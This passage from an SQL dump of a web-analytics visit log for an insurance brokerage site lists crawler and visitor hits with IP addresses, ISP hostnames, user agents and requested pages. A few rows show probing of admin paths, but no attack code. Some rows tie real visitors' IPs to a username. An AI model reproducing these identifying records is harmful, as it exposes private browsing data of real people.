+http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6320,'0b_b088cd65bf36aef60a1402ba39a93d54','1458303387','207.46.13.131','msnbot-207-46-13-131.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6323,'0b_b088cd65bf36aef60a1402ba39a93d54','1458303388','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6324,'0b_821581e3a9754867c72dfe8b8c93bf7d','1458303465','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6327,'0b_821581e3a9754867c72dfe8b8c93bf7d','1458303465','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6329,'0b_6c8f7ae43404e6d5428dd50913367d70','1458303832','141.8.143.235','spider-141-8-143-235.yandex.com','/term-quotes/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(6332,'0b_e48d25e0ed03e35a77fa546af32889e8','1458304457','66.249.83.213,24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(6333,'0b_16ef12b10b4c8f6772a898fe8debafb6','1458306429','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(6335,'0b_16ef12b10b4c8f6772a898fe8debafb6','1458306431','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(6338,'0b_e2e20251791a95df6aed15cc5b384833','1458306692','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(6339,'0b_e2e20251791a95df6aed15cc5b384833','1458306693','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(6342,'0b_bb7171752e7226e04ce5b45e2aebfbea','1458308075','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6345,'0b_bb7171752e7226e04ce5b45e2aebfbea','1458308635','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6347,'0b_bb7171752e7226e04ce5b45e2aebfbea','1458308698','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6348,'0b_16ef12b10b4c8f6772a898fe8debafb6','1458309468','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(6350,'0b_16ef12b10b4c8f6772a898fe8debafb6','1458309478','108.58.88.178','ool-6c3a58b2.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(6351,'0b_98192c14499f59b288fd4fd23b9326cd','1458310552','180.76.15.29','baiduspider-180-76-15-29.crawl.baidu.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(6353,'0b_09645de37756050dab06d6bc28a4ad93','1458311928','192.169.196.34','ip-192-169-196-34.ip.secureserver.net','/admin/','Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','','',0,'Android 2','Safari 4 Mobile','us','','','','','','','0','0',0),(6354,'0b_09645de37756050dab06d6bc28a4ad93','1458311930','192.169.196.34','ip-192-169-196-34.ip.secureserver.net','/wp-admin/','Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','','',0,'Android 2','Safari 4 Mobile','us','','','','','','','0','0',0),(6357,'0b_09645de37756050dab06d6bc28a4ad93','1458311930','192.169.196.34','ip-192-169-196-34.ip.secureserver.net','/user/','Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','','',0,'Android 2','Safari 4 Mobile','us','','','','','','','0','0',0),(6360,'0b_550ea8bc0c273a9dd0983c95f367df87','1458313205','66.249.73.187','crawl-66-249-73-187.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(6363,'0b_4eba50c0f0f545695df56673b2ca7329','1458313326','67.212.162.98','scan03.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(6366,'0b_4eba50c0f0f545695df56673b2ca7329','1458313330','67.212.162.98','scan03.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(6368,'0b_4eba50c0f0f545695df56673b2ca7329','1458313332','67.212.162.98','scan03.sitelock.com','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(6371,'0b_4eba50c0f0f545695df56673b2ca7329','1458313335','67.212.162.98','scan03.sitelock.com','/comments/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(6372,'0b_4eba50c0f0f545695df56673b2ca7329','1458313339','67.212.162.98','scan03.sitelock.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(6375,'0b_4eba50c0f0f545695df56673b2ca7329','1458313341','67.212.162.98','scan03.sitelock.com','/aig-releases-new-term-rates-and-re-enters-ny/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(6378,'0b_4eba50c0f0f545695df56673b2ca7329','1458313343','67.212.162.98','scan03.sitelock.com','/agent-tools/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(6381,'0b_4eba50c0f0f545695df56673b2ca7329','1458313345','67.212.162.98','scan03.sitelock.com','/term-quotes/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(6383,'0b_4eba50c0f0f545695df56673b2ca7329','1458313351','67.212.162.98','scan03.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(6384,'0b_550ea8bc0c273a9dd0983c95f367df87','1458313586','66.249.73.187','crawl-66-249-73-187.googlebot.com','/under.html','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(6387,'0b_273d6a221b19ab086da6fafa461e29c9','1458314070','158.69.27.74','ns518193.ip-158-69-27.net','/','Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','','',0,'Win2003','Chrome 35','','','','','','','','0','0',0),(6389,'0b_631f8065b75a27974343774c0aef516b','1458314107','209.234.193.210','209-234-193-210.static.twtelecom.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1324 x 745','','','','','','0','0',0),(6390,'0b_631f8065b75a27974343774c0aef516b','1458314109','209.234.193.210','209-234-193-210.static.twtelecom.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1324 x 745','','','','','','0','0',0),(6393,'0b_631f8065b75a27974343774c0aef516b','1458314135','209.234.193.210','209-234-193-210.static.twtelecom.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1324 x 745','','','','','','0','0',0),(6396,'0b_631f8065b75a27974343774c0aef516b','1458314146','209.234.193.210','209-234-193-210.static.twtelecom.net','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/about-us/','',0,'Win7 x64','IE 11','us','1324 x 745','','','','','','0','51',0),(6399,'0b_ace263a4ef72d875f8091faa3a55b201','1458315242','66.249.88.123,12.158.108.226','12.158.108.226','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(6401,'0b_631f8065b75a27974343774c0aef516b','1458315791','209.234.193.210','209-234-193-210.static.twtelecom.net','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/meet-the-eib-team/','',0,'Win7 x64','IE 11','us','1324 x 745','','','','','','0','51',0),(6404,'0b_631f8065b75a27974343774c0aef516b','1458315798','209.234.193.210','209-234-193-210.static.twtelecom.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/insentives/','',0,'Win7 x64','IE 11','us','1324 x 745','','','','','','0','51',0),(6405,'0b_631f8065b75a27974343774c0aef516b','1458315800','209.234.193.210','209-234-193-210.static.twtelecom.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/licensing-contracting/','',0,'Win7 x64','IE 11','us','1324 x 745','','','','','','0','51',0),(6408,'0b_631f8065b75a27974343774c0aef516b','1458315805','209.234.193.210','209-234-193-210.static.twtelecom.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1324 x 745','','','','','','0','51',0),(6411,'0b_631f8065b75a27974343774c0aef516b','1458315809','209.234.193.210','209-234-193-210.static.twtelecom.net','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 11','us','1324 x 745','','','','','','0','51',0),(6413,'0b_631f8065b75a27974343774c0aef516b','1458315811','209.234.193.210','209-234-193-210.static.twtelecom.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/contact/','',0,'Win7 x64','IE 11','us','1324 x 745','','','','','','0','51',0),(6414,'0b_631f8065b75a27974343774c0aef516b','1458315812','209.234.193.210','209-234-193-210.static.twtelecom.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1324 x 745','','','','','','0','0',0),(6416,'0b_214229fb61e911f6d84bb7d62f8451ef','1458319268','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(6417,'0b_5d5a985ec2e5f041d84ce0ca14afba71','1458320164','66.249.73.187','crawl-66-249-73-187.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(6420,'0b_5c0278bc8a1431f7ee8d4f3c37e02e40','1458320223','209.234.193.210','209-234-193-210.static.twtelecom.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1324 x 745','','','','','','0','0',0),(6423,'0b_5c0278bc8a1431f7ee8d4f3c37e02e40','1458320224','209.234.193.210','209-234-193-210.static.twtelecom.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1324 x 745','','','','','','0','0',0),(6425,'0b_5c0278bc8a1431f7ee8d4f3c37e02e40','1458320260','209.234.193.210','209-234-193-210.static.twtelecom.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1324 x 745','','','','','','0','51',0),(6426,'0b_5c0278bc8a1431f7ee8d4f3c37e02e40','1458320265','209.234.193.210','209-234-193-210.static.twtelecom.net','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/about-us/','',0,'Win7 x64','IE 11','us','1324 x 745','','','','','','0','51',0),(6428,'0b_c7ed55600418f0eb55997cede7b9a336','1458320432','54.200.135.221','ec2-54-200-135-221.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','','','','','0','0',0),(6431,'0b_c7ed55600418f0eb55997cede7b9a336','1458320435','54.200.135.221','ec2-54-200-135-221.us-west-2.compute.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','http://www.empireins.com/','',0,'MacOSX','Firefox 39','us','','','','','','','0','0',0),(6434,'0b_b956532b5a1e1b38c028411ababc49c7','1458320464','54.200.135.221','ec2-54-200-135-221.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','','','','','','','','0','0',0),(6437,'0b_b956532b5a1e1b38c028411ababc49c7','1458320467','54.200.135.221','ec2-54-200-135-221.us-west-2.compute.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','','','','','','','0','0',0),(6438,'0b_71bed31ea787dec9e2fa34df019f8ec8','1458320669','68.180.229.91','b115355.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(6440,'0b_71bed31ea787dec9e2fa34df019f8ec8','1458320670','68.180.229.91','b115355.yse.yahoo.net','/products.html','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(6441,'0b_cccfbfdbf2dce48691e4b7c0cc8467aa','1458321636','54.187.75.162','ec2-54-187-75-162.us-west-2.compute.amazonaws.com','/term-quotes/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','','','','','0','0',0),(6443,'0b_cccfbfdbf2dce48691e4b7c0cc8467aa','1458321636','54.187.75.162','ec2-54-187-75-162.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','','','','','0','0',0),(6446,'0b_cccfbfdbf2dce48691e4b7c0cc8467aa','1458321637','54.187.75.162','ec2-54-187-75-162.us-west-2.compute.amazonaws.com','/igo/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','','','','','0','0',0),(6449,'0b_cccfbfdbf2dce48691e4b7c0cc8467aa','1458321640','54.187.75.162','ec2-54-187-75-162.us-west-2.compute.amazonaws.com','/forms/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','','','','','0','0',0),(6450,'0b_cccfbfdbf2dce48691e4b7c0cc8467aa','1458321640','54.187.75.162','ec2-54-187-75-162.us-west-2.compute.amazonaws.com','/carriers/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','','','','','0','0',0),(6452,'0b_cccfbfdbf2dce48691e4b7c0cc8467aa','1458321641','54.187.75.162','ec2-54-187-75-162.us-west-2.compute.amazonaws.com','/register/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','','','','','0','0',0),(6453,'0b_cccfbfdbf2dce48691e4b7c0cc8467aa','1458321641','54.187.75.162','ec2-54-187-75-162.us-west-2.compute.amazonaws.com','/insentives/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','','','','','0','0',0),(6455,'0b_cccfbfdbf2dce48691e4b7c0cc8467aa','1458321641','54.187.75.162','ec2-54-187-75-162.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','','','','','0','0',0),(6458,'0b_cccfbfdbf2dce48691e4b7c0cc8467aa','1458321642','54.187.75.162','ec2-54-187-75-162.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','','','','','0','0',0),(6461,'0b_cccfbfdbf2dce48691e4b7c0cc8467aa','1458321642','54.187.75.162','ec2-54-187-75-162.us-west-2.compute.amazonaws.com','/agent-tools/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','','','','','0','0',0),(6464,'0b_cccfbfdbf2dce48691e4b7c0cc8467aa','1458321643','54.187.75.162','ec2-54-187-75-162.us-west-2.compute.amazonaws.com','/case-status/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','','','','','0','0',0),(6465,'0b_cccfbfdbf2dce48691e4b7c0cc8467aa','1458321643','54.187.75.162','ec2-54-187-75-162.us-west-2.compute.amazonaws.com','/licensing-contracting/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','','','','','0','0',0),(6468,'0b_cccfbfdbf2dce48691e4b7c0cc8467aa','1458321643','54.187.75.162','ec2-54-187-75-162.us-west-2.compute.amazonaws.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','','','','','0','0',0),(6470,'0b_cccfbfdbf2dce48691e4b7c0cc8467aa','1458321643','54.187.75.162','ec2-54-187-75-162.us-west-2.compute.amazonaws.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','','','','','0','0',0),(6471,'0b_78161dc92c6f2ced87c21f1abca79df3','1458323809','66.249.88.123,12.158.108.226','12.158.108.226','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(6473,'0b_2e40ea9aa38480e139e50be23754971c','1458324314','205.132.174.240','205.132.174.240','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'MacOSX','Chrome 49','us','','Google','','','','','0','0',0),(6476,'0b_39c88c022065d186ccee91949b360485','1458324682','47.21.51.130','ool-2f153382.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(6479,'0b_39c88c022065d186ccee91949b360485','1458324683','47.21.51.130','ool-2f153382.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(6480,'0b_39c88c022065d186ccee91949b360485','1458324699','47.21.51.130','ool-2f153382.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(6483,'0b_39c88c022065d186ccee91949b360485','1458324711','47.21.51.130','ool-2f153382.static.optonline.net','/igo/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(6485,'0b_39c88c022065d186ccee91949b360485','1458324728','47.21.51.130','ool-2f153382.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/igo/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(6488,'0b_39c88c022065d186ccee91949b360485','1458324728','47.21.51.130','ool-2f153382.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(6489,'0b_39c88c022065d186ccee91949b360485','1458324733','47.21.51.130','ool-2f153382.static.optonline.net','/contact/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(6492,'0b_39c88c022065d186ccee91949b360485','1458324803','47.21.51.130','ool-2f153382.static.optonline.net','/insentives/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/contact/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(6494,'0b_39c88c022065d186ccee91949b360485','1458324807','47.21.51.130','ool-2f153382.static.optonline.net','/contact/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(6497,'0b_39c88c022065d186ccee91949b360485','1458324810','47.21.51.130','ool-2f153382.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/contact/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(6500,'0b_39c88c022065d186ccee91949b360485','1458324812','47.21.51.130','ool-2f153382.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(6503,'0b_696ceafb46a52e9ac1bcd7238dd33ed5','1458325640','93.158.205.89','93.158.205.89','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(6506,'0b_696ceafb46a52e9ac1bcd7238dd33ed5','1458325652','93.158.205.89','93.158.205.89','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(6509,'0b_69fe251c6d4f5f61f1edd2f09fee8623','1458325985','66.249.73.178','crawl-66-249-73-178.googlebot.com','/agent-tools/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(6510,'0b_09fe696deda4b8f99726046bcaa91536','1458326274','216.52.89.4','216.52.89.4','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 49','us','','Google','','','','','0','0',0),(6512,'0b_b047499761b27cad1c4b9e0f85707d57','1458328048','70.195.195.244','244.sub-70-195-195.myvzw.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4','https://www.google.com/','_notprovided_',1,'iPhone OS','Safari 8 Mobile','us','375 x 667','Google','','','','','0','0',0),(6513,'0b_b047499761b27cad1c4b9e0f85707d57','1458328052','70.195.195.244','244.sub-70-195-195.myvzw.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4','http://www.empireins.com/','',0,'iPhone OS','Safari 8 Mobile','us','375 x 